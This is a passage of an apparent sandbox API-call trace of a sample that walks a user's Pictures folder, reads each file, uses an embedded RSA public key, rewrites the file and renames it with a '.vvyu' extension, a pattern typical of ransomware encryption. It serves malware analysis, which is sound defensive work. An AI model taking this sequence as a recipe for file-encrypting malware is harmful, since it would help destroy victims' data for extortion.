[0201.813] GetCurrentThreadId () returned 0x66c [0201.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0201.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0201.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0201.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0201.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0201.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3590 [0201.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0201.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0201.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0201.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0201.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3530 [0201.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0201.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0201.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0201.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0201.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3548 [0201.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0201.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0201.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0201.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3518 [0201.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0201.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35a8 [0201.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0201.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3578 [0201.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3560 [0201.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35c0 [0201.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3560 | out: hHeap=0x620000) returned 1 [0201.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3560 [0201.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3578 | out: hHeap=0x620000) returned 1 [0201.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0201.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0201.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0201.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3530 | out: hHeap=0x620000) returned 1 [0201.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3530 [0201.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0201.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3590 | out: hHeap=0x620000) returned 1 [0201.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0201.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35c0 | out: hHeap=0x620000) returned 1 [0201.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0201.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0201.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0201.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3530 | out: hHeap=0x620000) returned 1 [0201.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0201.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0201.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0201.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0201.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0201.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0201.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0201.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0201.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0201.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0201.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3560 | out: hHeap=0x620000) returned 1 [0201.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35a8 | out: hHeap=0x620000) returned 1 [0201.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3548 | out: hHeap=0x620000) returned 1 [0201.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3518 | out: hHeap=0x620000) returned 1 [0201.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0201.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0201.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0201.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3500 | out: hHeap=0x620000) returned 1 [0201.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8fff0 | out: hHeap=0x620000) returned 1 [0201.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0201.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0201.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0201.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0201.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0201.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0201.825] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x13fa7, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x13fa7, lpOverlapped=0x0) returned 1 [0201.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0201.826] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x13fac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.826] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0201.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0201.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0201.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0201.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0201.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0201.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0201.828] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0201.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0201.828] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0201.828] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0201.828] CloseHandle (hObject=0x510) returned 1 [0201.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c2f930 [0201.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x2ea6a68 [0201.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c2f930 | out: hHeap=0x620000) returned 1 [0201.830] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\faTUjwnla.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\ydph4cpxgp3qwyuc\\fatujwnla.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\faTUjwnla.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\ydph4cpxgp3qwyuc\\fatujwnla.bmp.vvyu")) returned 1 [0201.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.832] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0201.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6e2d18 | out: hHeap=0x620000) returned 1 [0201.835] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x910e9760, ftCreationTime.dwHighDateTime=0x1d89922, ftLastAccessTime.dwLowDateTime=0xfab8a700, ftLastAccessTime.dwHighDateTime=0x1d89e4f, ftLastWriteTime.dwLowDateTime=0xfab8a700, ftLastWriteTime.dwHighDateTime=0x1d89e4f, nFileSizeHigh=0x0, nFileSizeLow=0x5107, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="irzPaaYV6FB7p4.gif", cAlternateFileName="IRZPAA~1.GIF")) returned 1 [0201.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x6e2d18 [0201.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.835] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\irzPaaYV6FB7p4.gif") returned=".gif" [0201.835] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\irzPaaYV6FB7p4.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\ydph4cpxgp3qwyuc\\irzpaayv6fb7p4.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0201.836] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=20743) returned 1 [0201.836] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0201.838] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x50e1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.838] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0201.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.841] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.841] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x5107, lpOverlapped=0x0) returned 1 [0201.841] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0201.841] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.841] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.842] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0201.843] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0201.843] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0201.843] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0201.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0201.843] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0201.843] GetLastError () returned 0x0 [0201.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.843] GetLastError () returned 0x0 [0201.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.843] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0201.843] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0201.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.844] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0201.844] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0201.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.844] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0201.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5110) returned 0x2ea99b0 [0201.844] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0201.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0201.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0201.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0201.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fff0 [0201.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3500 [0201.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e90038 [0201.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3518 [0201.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3548 [0201.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35a8 [0201.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3560 [0201.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0201.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0201.846] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0201.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0201.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3548 | out: hHeap=0x620000) returned 1 [0201.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3560 | out: hHeap=0x620000) returned 1 [0201.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35a8 | out: hHeap=0x620000) returned 1 [0201.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0201.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35a8 [0201.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0201.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3560 [0201.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0201.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3548 [0201.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0201.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0201.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0201.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0201.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0201.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0201.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 